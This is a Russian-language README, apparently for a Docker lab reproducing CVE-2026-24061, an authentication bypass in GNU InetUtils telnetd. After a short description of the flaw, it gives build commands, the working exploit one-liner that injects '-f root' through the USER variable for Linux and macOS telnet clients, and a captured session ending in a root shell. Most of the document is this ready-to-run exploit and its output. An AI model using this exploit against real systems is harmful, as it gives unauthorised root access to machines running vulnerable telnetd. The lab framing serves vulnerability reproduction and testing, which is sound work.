
GNU telnetd служба из GNU InetUtils обход аутентификации
В январе 2026 года служба GNU telnetd из состава GNU InetUtils была признана уязвимой к обходу аутентификации, о чём сообщил Kyu Neushwaistein (он же Carlos Cortes Alvarez). Отслеживаемая как CVE-2026-24061, эта уязвимость позволяет злоумышленнику установить Telnet-сеанс без предоставления действительных учётных данных, получая несанкционированный доступ к целевой системе. Уязвимость присутствует вплоть до версии 2.7-2 службы GNU telnetd и выглядит так, будто она взята прямиком из 90-х.
Это уязвимость внедрения аргументов (CWE-88) с оценкой CVSS v3.1 9.8 (критическая).
Ссылки:
Сборка и запуск:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
После запуска службы telnetd будет прослушивать порт 23.
Уязвимость позволяет обойти аутентификацию путём внедрения флага -f в переменную окружения USER. Когда telnetd получает имя пользователя, начинающееся с -f, он передаёт его программе login, которая интерпретирует -f как флаг пропуска аутентификации.
Используйте следующую команду для эксплуатации этой уязвимости и получения доступа root:
# Linux-клиент (требуется опция -a)
USER="-f root" telnet -a 127.0.0.1 23
# macOS-клиент (опция -a не требуется)
USER="-f root" telnet 127.0.0.1 23
После успешной эксплуатации вы получите root-доступ к оболочке без ввода пароля.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)